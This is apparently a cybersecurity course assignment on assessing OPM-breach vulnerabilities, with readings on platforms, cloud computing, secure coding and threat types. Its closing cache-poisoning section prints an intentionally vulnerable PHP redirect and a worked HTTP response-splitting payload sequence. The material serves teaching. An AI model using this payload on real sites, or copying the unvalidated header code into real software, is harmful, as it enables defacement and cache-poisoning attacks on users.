Project 2 Scenario
Assessing Information System Vulnerabilities and Risk
You are an information assurance management officer (IAMO) at an organization of your choosing. One morning, as you’re getting ready for work, you see an email from Karen, your manager. She asks you to come to her office as soon as you get in. When you arrive to your work, you head straight to Karen’s office. “Sorry for the impromptu meeting,” she says, “but we have a bit of an emergency. There’s been a security breach at the Office of Personnel Management.”
We don’t know how this happened, but we need to make sure it doesn’t happen again, says Karen. You’ll be receiving an email with more information on the security breach. Use this info to assess the information system vulnerabilities of the Office of Personnel Management.
At your desk, you open Karen’s email. She’s given you an OPM report from the Office of the Inspector General, or OIG. You have studied the OPM OIG report and found that the hackers were able to gain access through compromised credentials. The security breach could have been prevented if the Office of Personnel Management, or OPM, had abided by previous auditing reports and security findings. In addition, access to the databases could have been prevented by implementing various encryption schemas and could have been identified after running regularly scheduled scans of the systems.
Karen and the rest of the leadership team want you to compile your findings into a Security Assessment Report, or SAR. You will also create a Risk Assessment Report, or RAR, in which you identify threats, vulnerabilities, risks, and likelihood of exploitation and suggested remediation.
Project 2 Scenario
Assessing Information System Vulnerabilities and Risk
You are an information assurance management officer (IAMO) at an organization of your choosing. One morning, as you’re getting ready for work, you see an email from Karen, your manager. She asks you to come to her office as soon as you get in. When you arrive to your work, you head straight to Karen’s office. “Sorry for the impromptu meeting,” she says, “but we have a bit of an emergency. There’s been a security breach at the Office of Personnel Management.”
We don’t know how this happened, but we need to make sure it doesn’t happen again, says Karen. You’ll be receiving an email with more information on the security breach. Use this info to assess the information system vulnerabilities of the Office of Personnel Management.
At your desk, you open Karen’s email. She’s given you an OPM report from the Office of the Inspector General, or OIG. You have studied the OPM OIG report and found that the hackers were able to gain access through compromised credentials. The security breach could have been prevented if the Office of Personnel Management, or OPM, had abided by previous
auditing
reports and security findings. In addition, access to the databases could have been prevented by implementing various encryption schemas and could have been identified after running regularly scheduled scans of the systems.
Karen and the rest of the leadership team want you to compile your findings into a Security Assessment Report, or SAR. You will also create a Risk Assessment Report, or RAR, in which you identify threats, vulnerabilities, risks, and likelihood of exploitation and suggested remediation.
Project 2 Instructions
The security posture of the information systems infrastructure of an organization should be regularly monitored and assessed (including software, hardware, firmware components, governance policies, and implementation of security controls).
The monitoring and assessment of the infrastructure and its components, policies, and processes should also account for changes and new procurements in order to stay in step with ever-changing information system technologies.
The data breach at the US Office of Personnel Management (OPM) was one of the largest in US government history. It provides a series of lessons learned for other organizations in industry and the public sector. Some failures of security practices, such as lack of diligence with security controls and management of changes to the information systems infrastructure, were cited as contributors to the massive data breach in the OPM Office of the Inspector General’s (OIG)
Final Audit Report, which can be found in open-source searches.
Some of the findings in the report include:
· weak authentication mechanisms;
· lack of a plan for life-cycle management of the information systems;
· lack of a configuration management and change management plan;
· lack of inventory of systems, servers, databases, and network devices;
· lack of mature vulnerability scanning tools;
· lack of valid authorizations for many systems; and
· lack of plans of action to remedy the findings of previous audits.
The breach ultimately resulted in removal of OPM’s top leadership. The impact of the breach on the livelihoods of millions of people may never be fully known.
There is a critical need for security programs that can assess vulnerabilities and provide mitigations.
In this project, there are eight steps, including a lab, that will help you create your final deliverables. The deliverables for this project are as follows:
1. Security Assessment Report (SAR): This should be an eight- to 10-page double-spaced Word document with citations in APA format. The page count does not include figures, diagrams, tables, or citations.
2. Risk Assessment Report (RAR): This report should be a five- to six-page double-spaced Word document with citations in APA format. The page count does not include figures, diagrams, tables, or citations.
Step1: Enterprise Network Diagram
In this project, you will research and learn about types of networks and their secure constructs that may be used in an organization to accomplish the functions of the organization’s mission.
You will propose a local area network (LAN) and a wide area network (WAN) for the organization, define the systems environment, and incorporate this information in a network diagram. You will discuss the security benefits of your chosen network design.
Read the following resources about some of the computing platforms available for networks and discuss how these platforms could be implemented in your organization:
Common Computing Platforms
Computing platforms have three main components: hardware, the operating system (OS), and applications. The hardware
is the physical equipment/machine that runs the OS and applications. It generally consists of the central processing unit (CPU) or processor, storage, and memory. The operating system (OS) communicates between the hardware and the applications
run by the end user.
Different platforms are used for traditional desktops and laptops and the new touchscreen phones and tablets. Common processors include Intel Core and AMD (for desktops) and ARM (modified by Apple and Qualcomm to make processors for phones). The most popular operating systems for desktops are Windows and Linux, and for phones, are iOS and Android.
Compatible applications are developed for specific systems by different companies, including Microsoft, Apple, Google, and Adobe.
The Hardware Cloud: Utility Computing and Its Cousins
Learning Objectives
1. Distinguish between SaaS and hardware clouds.
2. Provide examples of firms and uses of hardware clouds.
3. Understand the concepts of cloud computing, cloudbursting, and black swan events.
4. Understand the challenges and economics involved in shifting computing hardware to the cloud.
While SaaS provides the software
and hardware to replace an internal information system, sometimes a firm develops its own custom software but wants to pay someone else to run it for them. That’s where hardware clouds, utility computing, and related technologies come in. In this model, a firm replaces computing hardware that it might otherwise run on-site with a service provided by a third party online. While the term utility computing was fashionable a few years back (and old timers claim it shares a lineage with terms like hosted computing or even time sharing), now most in the industry have begun referring to this as an aspect of cloud computing, often referred to as hardware clouds. Computing hardware used in this scenario exists “in the cloud,” meaning somewhere on the Internet. The costs of systems operated in this manner look more like a utility bill—you only pay for the amount of processing, storage, and telecommunications used. Tech research firm Gartner has estimated that 80 percent of corporate tech spending goes toward data center maintenance. J. Rayport, “Cloud Computing Is No Pipe Dream,”
BusinessWeek, December 9, 2008. Hardware-focused cloud computing provides a way for firms to chip away at these costs.
Major players are spending billions building out huge data centers to take all kinds of computing out of the corporate data center and place it in the cloud. While cloud vendors typically host your software on their systems, many of these vendors also offer additional tools to help in creating and hosting apps in the cloud. Salesforce.com offers Force.com, which includes not only a hardware cloud but also several cloud-supporting tools, such as a programming environment (IDE) to write applications specifically tailored for Web-based delivery. Google’s App Engine offers developers several tools, including a database product called Big Table. And Microsoft offers a competing product—Windows Azure that runs the SQL Azure database. These efforts are often described by the phrase platform as a service (PaaS) since the cloud vendor provides a more complete platform (e.g., hosting hardware, operating system, database, and other software), which clients use to build their own applications.
Another alternative is called infrastructure as a service (IaaS). This is a good alternative for firms that want even more control. In IaaS, clients can select their own operating systems, development environments, underlying applications like databases, or other software packages (i.e., clients, and not cloud vendors, get to pick the platform), while the cloud firm usually manages the infrastructure (providing hardware and networking). IaaS services are offered by a wide variety of firms, including Amazon, Rackspace, Oracle, Dell, HP, and IBM.
Still other cloud computing efforts focus on providing a virtual replacement for operational hardware like storage and backup solutions. These include the cloud-based backup efforts like EMC’s Mozy, and corporate storage services like Amazon’s Simple Storage Solution (S3). Even efforts like Apple’s iCloud that sync user data across devices (phone, multiple desktops) are considered part of the cloud craze. The common theme in all of this is leveraging computing delivered over the Internet to satisfy the computing needs of both users and organizations.
Clouds in Action: A Snapshot of Diverse Efforts
Large, established organizations, small firms and start-ups are all embracing the cloud. The examples below illustrate the wide range of these efforts.
Journalists refer to the
New York Times as, “The Old Gray Lady,” but it turns out that the venerable paper is a cloud-pioneering whippersnapper. When the
Times decided to make roughly one hundred fifty years of newspaper archives (over fifteen million articles) available over the Internet, it realized that the process of converting scans into searchable PDFs would require more computing power than the firm had available. J. Rayport, “Cloud Computing Is No Pipe Dream,”
Business Week, December 9, 2008. To solve the challenge, a
Times IT staffer simply broke out a credit card and signed up for Amazon’s EC2 cloud computing and S3 cloud storage services. The
Times then started uploading terabytes of information to Amazon, along with a chunk of code to execute the conversion. While anyone can sign up for services online without speaking to a rep, someone from Amazon eventually contacted the
Times to check in after noticing the massive volume of data coming into its systems. Using one hundred of Amazon’s Linux servers, the
Times job took just twenty-four hours to complete. In fact, a coding error in the initial batch forced the paper to rerun the job. Even the blunder was cheap—just two hundred forty dollars in extra processing costs. Says a member of the
Times IT group: “It would have taken a month at our facilities, since we only had a few spare PCs…It was cheap experimentation, and the learning curve isn’t steep.” G. Gruman, “Early Experiments in Cloud Computing,”
InfoWorld, April 7, 2008.
NASDAQ also uses Amazon’s cloud as part of its Market Replay system. The exchange uses Amazon to make terabytes of data available on demand, and uploads an additional thirty to eighty gigabytes every day. Market Reply allows access through an Adobe AIR interface to pull together historical market conditions in the ten-minute period surrounding a trade’s execution. This allows NASDAQ to produce a snapshot of information for regulators or customers who question a trade. Says the exchange’s VP of Product Development, “The fact that we’re able to keep so much data online indefinitely means the brokers can quickly answer a question without having to pull data out of old tapes and CD backups.” P. Grossman, “Cloud Computing Begins to Gain Traction on Wall Street,”
Wall Street and Technology, January 6, 2009. NASDAQ isn’t the only major financial organization leveraging someone else’s cloud. Others include Merrill Lynch, which uses IBM’s Blue Cloud servers to build and evaluate risk analysis programs; and Morgan Stanley, which relies on Force.com for recruiting applications.
IBM’s cloud efforts, which count Elizabeth Arden and the U.S. Golf Association among their customers, offer several services, including so-called cloudbursting. In a cloudbursting scenario a firm’s data center running at maximum capacity can seamlessly shift part of the workload to IBM’s cloud, with any spikes in system use metered, utility style. Cloudbursting is appealing because forecasting demand is difficult and can’t account for the ultrarare, high-impact events, sometimes called black swans. Planning to account for usage spikes explains why the servers at many conventional corporate IS shops run at only 10 to 20 percent capacity. J. Parkinson, “Green Data Centers Tackle LEED Certification,”
SearchDataCenter.com, January 18, 2007. While Cloud Labs cloudbursting service is particularly appealing for firms that already have a heavy reliance on IBM hardware in-house, it is possible to build these systems using the hardware clouds of other vendors, too.
Salesforce.com’s Force.com cloud is especially tuned to help firms create and deploy custom Web applications. The firm makes it possible to piece together projects using premade Web services that provide software building blocks for features like calendaring and scheduling. The integration with the firm’s SaaS CRM effort, and with third-party products like Google Maps allows enterprise mash-ups that can combine services from different vendors into a single application that’s run on Force.com hardware. The platform even includes tools to help deploy Facebook applications. Intuitive Surgical used Force.com to create and host a custom application to gather clinical trial data for the firm’s surgical robots. An IS manager at Intuitive noted, “We could build it using just their tools, so in essence, there was no programming.” G. Gruman, “Early Experiments in Cloud Computing,”
InfoWorld, April 7, 2008. Other users include Jobscience, which used Force.com to launch its online recruiting site; and Harrah’s Entertainment, which uses Force.com applications to manage room reservations, air travel programs, and player relations.
Challenges Remain
Hardware clouds and SaaS share similar benefits and risk, and as our discussion of SaaS showed, cloud efforts aren’t for everyone. Some additional examples illustrate the challenges in shifting computing hardware to the cloud.
For all the hype about cloud computing, it doesn’t work in all situations. From an architectural standpoint, most large organizations run a hodgepodge of systems that include both package applications and custom code written in-house. Installing a complex set of systems on someone else’s hardware can be a brutal challenge and in many cases is just about impossible. For that reason we can expect most cloud computing efforts to focus on new software development projects rather than options for old software. Even for efforts that can be custom-built and cloud-deployed, other roadblocks remain. For example, some firms face stringent regulatory compliance issues. To quote one tech industry executive, “How do you demonstrate what you are doing is in compliance when it is done outside?” G. Gruman, “Early Experiments in Cloud Computing,”
InfoWorld, April 7, 2008.
Firms considering cloud computing need to do a thorough financial analysis, comparing the capital and other costs of owning and operating their own systems over time against the variable costs over the same period for moving portions to the cloud. For high-volume, low-maintenance systems, the numbers may show that it makes sense to buy rather than rent. Cloud costs can seem super cheap at first. Sun’s early cloud effort offered a flat fee of one dollar per CPU per hour. Amazon’s cloud storage rates were twenty-five cents per gigabyte per month. But users often also pay for the number of accesses and the number of data transfers. C. Preimesberger, “Sun’s ‘Open’-Door Policy,”
eWeek, April 21, 2008. A quarter a gigabyte a month may seem like a small amount, but system maintenance costs often include the need to clean up old files or put them on tape. If unlimited data is stored in the cloud, these costs can add up.
Firms should enter the cloud cautiously, particularly where mission-critical systems are concerned. Amazon’s spring 2011 cloud collapse impacted a number of firms, especially start-ups looking to leanly ramp up by avoiding buying and hosting their own hardware. HootSuite and Quora were down completely, Reddit was in “emergency read-only mode,” and Foursquare, GroupMe, and SCVNGR experienced glitches. Along with downtime, a small percentage (roughly 0.07 percent) of data involved in the crash was lost. A. Hesseldahl, “Amazon Details Last Week’s Cloud Failure, and Apologizes,”
AllThingsD, April 29, 2011. If a cloud vendor fails you and all your eggs are in one basket, then you’re down, too. Vendors with multiple data centers that are able to operate with fault-tolerant provisioning, keeping a firm’s efforts at more than one location to account for any operating interruptions, will appeal to firms with stricter uptime requirements, but even this isn’t a guarantee. A human configuration error hosed Amazon’s clients, despite the fact that the firm had confirmed redundant facilities in multiple locations. M. Rosoff, “Inside Amazon’s Cloud Disaster,”
BusinessInsider, April 22, 2011. Cloud firms often argue that their expertise translates into less downtime and failure than conventional corporate data centers, but no method is without risks.
Distributed Computing: A Definition
A distributed system is one in which the processors are less strongly connected. A typical distributed system consists of many independent computers in the same room, attached via network connections. Such an arrangement is often called a cluster.
In a distributed system, each processor has its own independent memory. This precludes using shared memory for communicating. Processors instead communicate by sending messages. In a cluster, these messages are sent via the network. Though message passing is much slower than shared memory, it scales better for many processors, and it is cheaper. Plus programming such a system is arguably easier than programming for a shared-memory system, since the synchronization involved in waiting to receive a message is more intuitive. Thus, most large systems today use message passing for interprocessor communication.
Computing Platforms
Today, smartphones and tablets can all run sophisticated software applications. Each have their own operating system that determines what applications can be run on each of them. Now, this tutorial looks at common hardware platforms that exist for desktop, PCs, laptops, and smaller mobile devices, such as phones and tablets.
So, we’re going to start our discussion by looking at components of the typical computing device.
At the very lower level here, we have the hardware. And one of the most important things is what central processing unit or CPU the hardware is going to use. So, we’ll look at different types of CPUs that support different platforms, whether it’d be a desktop or a phone.
After this, we have the operating system, the OS. Now, sometimes the OS, you can think of as having a couple layers. And the bottom layer is sort of the core OS service, sometimes called the kernel. Sometimes, it’s also called the Hardware Abstraction Layer or HAL. It’s that part of the operating system that communicates directly with the hardware, whether it’d be the CPU or the video card and so on. And the remaining part of the operating system services sit on top of this.
At the very top is the application, and the application has to be written for a particular operating system. So you can’t run an application designed for a Macintosh operating system if you have a Windows operating system here.
Finally, the user is going to interact with the app through the graphical interface or graphical user interface. So, using keyboard, mouse could be touched, they interact with the app. So those are the three basic components of any computing platform.
Now, we’re going to look at the typical desktop platforms that have existed for a while and we’re going to look at a few different CPUs that are on the market that form the basis of the hardware platform. So, Intel make probably the most popular CPU. And today, it’s called the Intel Core Series. A few years ago, Motorola had a few CPUs that it used and they were given the name G3 and G4. And these were called power PCs. Higher end for work stations, people that did 3D CAD and animation were using– trying to use more, even more powerful CPUs and they were based on technology called RISC and such as CPU and there were others just called a SPARC CPU or SPARC processor.
Now, on each of these CPUs, various operating systems existed. So in the Intel Core family, we typically have Windows. And we have a few different– obviously, different versions, but you can have two main types of Windows, what’s called 32-bit Windows which is designated by x86 or the 64-bit version of Windows, we won’t go into that now which is called, x64. But there are many other operating systems that run on the Intel Core which we’ll look at a bit later.
In the work station or sort of powerful desktop PCs, typically, some version of Unix run on here. And in this case, in the SPARC case, it was a company called Sun that created an operating system called, Solaris. They have since been bought up by Oracle. And we would have, on top of here, are apps designed for Unix.
For the power PC, G3, G4 from Motorola, this is what OS X started to be based on. And OS X at its core has Unix as well, so we can think of this as OS X residing on top of the Unix core. Now, as things evolved, companies wanted faster and faster processors. So, this gave way to an even faster processor created by IBM called the G5. And so, OS X was designed to run on the IBM G5 processor. And again, we have apps here designed to run on this version of OS X. At this time as well, laptops are becoming more and more important. So, mobility was important. And with mobility, batteries were important. So, we wanted a bit of a shift from performance to something that had performance and battery life. Apple found out that the G5 from IBM had good performance but consumed a lot of power, it couldn’t work very well in battery application, so they eventually dropped the G5 and they ported their entire operating system to the Intel Core family of CPUs. And what this meant was that they had a– to modify their operating system and redesign their apps. A little stir. So there’s still OS X apps but now they’re designed to run in an operating system that’s designed to run on the Intel Core CPU. So this was the desktop landscape. Into this day, still is the landscape for Windows desktop computers and OS X.
We’re now going to look at phones and tablets. And really the– I guess you can think of the developer of the smartphone or the company that really needs the smartphone take off was Apple. Apple looked around and found that the Intel Core CPU simply burn too much power for something that was going to be used in a small mobile device like a phone with a small battery. So they looked at a different company called ARM Holdings, it’s a British company that produced CPU that anyone could license. And this CPU had the best performance and battery life or efficiency that happened to be on the market. Since they licensed their designs, other companies could buy or pay a fee and modify that design and then manufacture their own CPUs. So this is what Apple did. So, Apple produced an ARM-based CPU and they just denoted as A as in, I assume A for Apple. So they have the A5 and the A6 currently out. And they used this CPU as the foundation for a new operating system. But they did base this operating system on OS X, but it was significantly different. Significantly different because it was designed for touch as opposed to a mouse. And they called this, operating system iOS. And now, to run applications on it, you need to have iOS apps. And they created an App Store where you could purchase iOS apps, but these iOS apps do not run on OS X. They only run on iOS mobile devices, and the devices typically are the iPhone, the iPod touch and the iPad.
Now, there are other companies who were looking at doing the same thing and a company called Qualcomm– — also licensed ARM technology to produce the CPU based on it, they called it Snapdragon. These are the CPUs that Android from Google used as the basis for their operating system. And Android are on such smartphones from Samsung, LG and from tablets. So here, we need Android apps which can run on these devices. Microsoft has come out with its own phone system, and they’ve called it Windows Phone 8. And it’s also based on the Snapdragon CPU which again is the derivative of ARM. So you need a Windows Phone 8 App in order to run on the Windows Phone. Now another company has gotten into the market and also licensed ARM’s technology.
And this is NVIDIA. And this produced the CPU called the Tegra. And this CPU is the one that is in Microsoft tablet or one of Microsoft tablet because they have two tablets. It is used in the Microsoft Surface but the surface which uses what is called Windows RT is the operating system. And we’re going to talk a bit about Windows RT. And we’re going to talk a bit about the apps that have to run here. So as you can see most, companies who are developing in smaller user devices like phones and tablets have not used an Intel processor because it simply consumes too much power. They have gone to an ARM-based technology. They’ve licensed that technology. They’ve modified it, added cores, made other modifications, added graphics processors and then use that as a basis on which to build a phone or a tablet or some mobile device. And Microsoft has not quite followed that type of model. So you see that Apple has made quite a distinction between its mobile device OS and its desktop.
What Microsoft has done has been to come out with a new operating system which they called Windows RT. And Windows RT has a new type of desktop and if you’ve seen Windows 8 and seeing the new desktop, that is the RT part Windows. So you can almost think of Windows 8 now is having a dual identify. So if we look at this, this is part– Windows RT is part of a new tablet system called a Window– a Microsoft Surface. So if you had a Window Surface tablet and they cost about $500 for this type of surface based on Windows RT, it would have an NVIDIA Tegra or an ARM-based processor. The operating system is no longer exactly Windows 8. It’s a form of Windows 8, but it’s modified called Windows RT. And you’ll notice that it has a little different user interface. These are called Live Tiles.
Now, Microsoft shows not to use the Windows Phone 8 operating system all though that operating system, if you have a Windows Phone 8, you will notice the interface looks the same but underneath is a different operating system. And so, we have apps that will run on this but they need to be designed for Windows RT.
Now, Microsoft also has Windows 8 for instance, windows– and different versions, for instance Windows 8 Pro Home or whatever. And part of Windows 8 is the typical desktop metaphor that you’re used to. So, if we look at how Windows 8 is now constructed, it has the normal windows core services or kernel but it’s now in Windows 8 been broken up into two more modules here. And on this part, it’s WinRT, don’t confuse that Windows RT, this is a WinRT component which is part of the Windows 8 operating system. And then we have the traditional Windows which is called the traditional Windows OS component here. Now Windows 8 can then run two different types of apps. It can run the– a WinRT type of app or a– what we’ll call a normal desktop app.
So in Windows 8, you might have an application like Adobe Photoshop that would be a typical Windows 8 app and so that would be app here, would run on the Windows OS in the core and will run on a Win– an Intel Core processor. The WinRT apps run on this type of interface. So what– you’ll notice that in Windows 8 now, we have this desktop, and we have this desktop we can get to. So we now have two types of applications. Microsoft is– has come out with a version of its tablet called Surface. So the tablet is called Surface but you can but the Surface with Windows RT or you can buy a surface with Windows 8 Pro. Now, Windows Surface with Windows RT can only use the RT style of apps.
Now this desktop here, you may have heard the term MetroWEB. First, Windows was calling this the Metro designed– the Metro desktop. They got into some copyright issues and it can’t use the term Metro but many people know it by the Metro name. So some people call these Metro apps. A Metro app or an app designed for this new interface will work on Windows 8 and it will run on Windows RT. So if you have a Windows RT surface. The big point here is that, if you have a normal Windows app like Photoshop or something that was designed for Windows, it will run on Windows 8 Pro but it will not, will not run on Windows RT. So if someone buys a surface with Windows RT and think they can run any Windows apps, they can’t. And so there has been some confusion on what applications will run on what form of Windows.
So here, Windows 8 now has a newer design. It has broken up the operating system to allow two different styles of apps. It looks like Microsoft is moving towards the WinRT style of apps for its desktop operating systems as well as mobile platform. Interestingly, Windows Phone 8 is different. So applications, I’m actually not sure if the Metro apps here will run on Windows Phone 8 or if they need their own apps. When you go to buy apps, you can buy apps from the Windows store, you will notice that apps have a new designation. You’ll find that apps that you can purchase have a designation often of i86, meaning they’ll run in a 32-bit version. i64 means they’ll also run in a 64-bit. And then, you may see the letters ARM. Meaning, it will run on an ARM or a Windows RT operating system. So if your app that you purchased has these designations, it will run on any of the Surface devices. However, if your app just has one of these two designations, it will not run on the surface Windows RT. So hopefully, that’s made it a little clear the difference between Windows RT, Windows 8 Pro, and given a little bit of a understanding about how any computing platform is componentized and how the hardware and the operating system work together to run various apps.
Include the rationale for each of the platforms you choose to include in your network design.
Cloud Computing
Cloud computing refers to the use of remote servers over the internet (instead of via local servers or devices) for the purpose of sharing resources. According to the National Institute of Standards and Technology (Mell & Grance, 2011):
Cloud computing is a model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction. (p. 2)
There are several advantages to cloud computing, including ease of use and upgrades, low capital expenditure, remote access capabilities from several locations, higher security/better data recovery, and optimized use of resources.
Cloud computing servers offer three models: software as a service, or SaaS (use of Internet-based applications through web browsers); platform as a service, or PaaS (use of cloud platforms that can be used to develop applications); and infrastructure as a service, or IaaS (use of remote infrastructure to create platforms and applications).
Cloud computing is a general term for the delivery of hosted services over the internet. The use of cloud computing can increase capacity or add capabilities on the fly without investing in new infrastructure, training new personnel, or licensing new software.
Just a few examples of cloud services are:
· Dropbox
· Evernote
· Mozy
· Carbonite
· Google Docs
· Runescape
References
Mell, P., & Grance, T. (2011). Special publication 800-145:
The NIST definition of cloud computing: Recommendations of the National Institute of Standards and Technology. National Institute of Standards and Technology. nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-145
Distributed Computing
Distributed computing is a computing model that uses multiple machines or servers connected through a network to share resources and complete tasks. Though the machines can be in different geographical locations, they work and appear as a single entity by communicating through encrypted messages. The latency and bandwidth of the communication channels can, however, have a significant impact on the working of the servers.
Distributed computing models perform tasks by breaking them into subtasks and solving them sequentially or simultaneously (using several machines). Hence, the models can provide greater efficiency and lower risk of failure (as compared with centralized computing models). Distributed computing systems typically use client-server, peer-to-peer, or tier architectures, depending on the functions performed by the servers.
Centralized Computing
Centralized computing refers to a computing model involving a central computer or server with high computing capability and sophisticated applications/software. The central server connects to client computers that have very low processing capability, so when a task needs to be performed, the clients simply send requests to the central server, which then performs most of the processing. The connection between the central server and clients can be either direct or over a network.
As all requests are processed by a central server, the centralized computing model has lower efficiency and higher risk of failure, compared with the decentralized or distributed computing model. However, the centralized model provides higher security and reliability, as all the data is stored and tasks are performed on a central server.
Secure Programming Fundamentals
It is important that programmers follow secure coding methods and adopt safe practices in the development stage, rather than trying to implement them at a later stage.
One of the fundamental secure programming practices is input validation, which is performed to prevent attacks from external sources. The National Institute of Standards and Technology (NIST) also emphasizes its importance for safe programming in its “Guide to Secure Web Services”:
Write all web service code in languages that automatically perform input validation, such as Java and C#, or if writing in C or C++, ensure that all expected input lengths and formats are explicitly specified, and that all inputs received are validated to ensure that they do not exceed those lengths or violate those formats. Error and exception handling should be expressly programmed to reject or truncate any inputs that violate the allowable input lengths/formats (Singhal et al., 2007).
Another fundamental practice to ensure security is
access control
, which is implemented to prevent unauthorized access, resulting in intentional or unintentional changes to the code. In addition it is important to include security tools and architectures that can detect code errors and prevent attacks. Finally, it is useful to develop mitigation strategies by modeling possible threats and testing the code.
References
Singhal, A., Winograd, T., & Scarfone, K. (2007).
Computer security: Guide to secure web services: Recommendations of the National Institute of Standards and Technology (Special Publication 800-95). http://csrc.nist.gov/publications/nistpubs/800-95/SP800-95
Step 2: Enterprise Threats
Review the OIG report on the OPM breach that you were asked to research and read about at the beginning of the project. The OIG report includes many security deficiencies that likely left OPM networks vulnerable to being breached.
In addition to those external threats, the report describes the ways OPM was vulnerable to
insider threats
. The information about the breach could be classified as threat intelligence. Define threat intelligence and explain what kind of threat intelligence is known about the OPM breach.
You just provided detailed background information on your organization. Next, you’ll describe threats to your organization’s system. Before you get started, select and explore the contents of the following link:
insider threats (also known as internal threats). As you’re reading, take note of which insider threats are a risk to your organization.
Now, differentiate between the external threats to the system and the insider threats. Identify where these threats can occur in the previously created diagrams. Relate the OPM threat intelligence to your organization. How likely is it that a similar attack will occur at your organization?
Step 3: Scan the Network
You will now investigate network traffic and the security of the network and information system infrastructure overall. Past network data has been logged and stored, as collected by a network analyzer tool such as Wireshark. Explore the tutorials and user guides to learn more about the
tools to monitor and analyze network activities
you will use.
You will perform a network analysis of the Wireshark files provided to you in Workspace and assess the network posture and any vulnerability or suspicious information you are able to obtain. You will identify any suspicious activities on the network through port scanning and other techniques. Include this information in your SAR.
In order to validate the assets and devices on the organization’s network, you should run scans using security and vulnerability assessment analysis tools such as OpenVAS, Nmap, or Nessus, depending on the operating systems of your organization’s networks. Live network traffic can also be sampled and scanned using Wireshark on either the Linux or Windows systems. Wireshark allows you to inspect all OSI layers of traffic information. Further analyze the packet capture for network performance, behavior, and any suspicious source and destination addresses on the networks.
Hackers frequently scan the internet for computers or networks to exploit. An effective firewall can prevent hackers from detecting the existence of networks. Hackers continue to scan ports, but if the hacker finds there is no response from the port and no connection, the hacker will move on. The firewall can block unwanted traffic and Nmap can be used to self-scan to test the responsiveness of the organization’s network to would-be hackers.
In the existing Wireshark files, identify whether any databases have been accessed. What are the IP addresses associated with that activity? Include this information in your SAR.
Step 4: Identify Security Issues
You have a suite of security tools, techniques, and procedures that can be used to assess the security posture of your organization’s network in a SAR.
Now it’s time to identify the security issues in your organization’s networks. You have previously learned about password-cracking tools; in this step, provide an analysis of the strength of passwords used by the employees in your organization. Are weak passwords a security issue for your organization?
Sep 5: Firewalls and Encryption
Next, examine these resources on
firewalls
and
auditing related to the use of the Relational Database Management System (RDBMS), the database system and data. Also review these resources related to
access control.
Determine the role of firewalls, encryption, and auditing for RDBMS in protecting information and monitoring the confidentiality, integrity, and availability of the information in the information systems.
Reflect any weaknesses found in the network and information system diagrams previously created, as well as in your developing SAR.
Step 6: Threat Identification
Now that you know the weaknesses in your organization’s network and information system, you will determine various known threats to the organization’s network architecture and IT assets.
Get acquainted with the following types of threats and attack techniques. Which are a risk to your organization?
Spoofing/Cache Poisoning Attacks
Spoofing refers to attacks in which a program pretends to be another program so that it can gain unauthorized access. DNS spoofing is a type of spoofing attack that is performed on DNS records. This type of attack can be carried out in various ways, including through cache poisoning, DNS compromising, and man-in-the-middle attacks.
Cache poisoning attacks involve an attack on the cache of the DNS servers and the replacement of one or more target IP addresses with spoofed ones. The attacker loads these addresses with corrupt content and malicious viruses, which affect the users accessing the cached IP addresses on the DNS server.
IP Address Spoofing
In this type of attack, the attacker sniffs network traffic to identify the pattern of legitimate IP addresses for that particular network. The attacker then forges the IP address in the packet headers. If the network uses the IP address to authenticate the user, the attacker is able to gain access to the network through the packet with the forged IP address. The attacker can then send malicious packets to the network. For example, an attacker may introduce a Trojan or keylogging application to the network after gaining access to it.
IP address spoofing is a network layer attack.
Cache Poisoning
Description
The impact of a maliciously constructed response can be magnified if it is cached either by a web cache used by multiple users or even the browser cache of a single user. If a response is cached in a shared web cache, such as those commonly found in proxy servers, then all users of that cache will continue to receive the malicious content until the cache entry is purged. Similarly, if the response is cached in the browser of an individual user, then that user will continue to receive the malicious content until the cache entry is purged, although only the user of the local browser instance will be affected.
To successfully carry out such an attack, an attacker:
· Finds the vulnerable service code, which allows them to fill the HTTP header field with many headers.
· Forces the cache server to flush its actual cache content, which we want to be cached by the servers.
· Sends a specially crafted request, which will be stored in cache.
· Sends the next request. The previously injected content stored in cache will be the response to this request.
This attack is rather difficult to carry out in a real environment. The list of conditions is long and hard to accomplish by the attacker. However it’s easier to use this technique than Cross-User Defacement.
A Cache Poisoning attack is possible because of HTTP Response Splitting and flaws in the web application. It is crucial from the attacker’s point of view that the application allows for filling the header field with more than one header using CR (Carrige Return) and LF (Line Feed) characters.
Examples
We have found a web page, which gets its service name from the “page” argument and then redirects (302) to this service.
e.g. http://testsite.com/redir.php?page=http://other.testsite.com/
And exemplary code of the redir.php:
rezos@dojo ~/public_html $ cat redir.php
header (“Location: ” . $_GET[‘page’]);
?>
Crafting appropriate request:
1. Remove page from the cache
GET http://testsite.com/index.html HTTP/1.1
Pragma: no-cache
Host: testsite.com
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
HTTP header fields Pragma: no-cache or ‘Cache-Control: no-cache’ will remove the page from cache (if the page is stored in cache, obviously).
2. Using HTTP Response Splitting we force cache server to generate two responses to one request
GET http://testsite.com/redir.php?site=%0d%0aContent-
Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-
Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aConte
nt-Length:%2020%0d%0aContent-
Type:%20text/html%0d%0a%0d%0adeface! HTTP/1.1
Host: testsite.com
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
We are intentionally setting the future time (in the header it’s set to 27 October 2009) in the second response HTTP header “Last-Modified” to store the response in the cache.
We may get this effect by setting the following headers:
· Last-Modified (checked byt the If-Modified-Since header)
· ETag (checked by the If-None-Match header)
3. Sending request for the page, which we want to replace in the cache of the server
GET http://testsite.com/index.html HTTP/1.1
Host: testsite.com
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
In theory, the cache server should match the second answer from the request #2 to the request #3. In this way we’ve replaced the cache content.
The rest of the requests should be executed during one connection (if the cache server doesn’t require a more sophisticated method to be used), possibly immediately one after another.
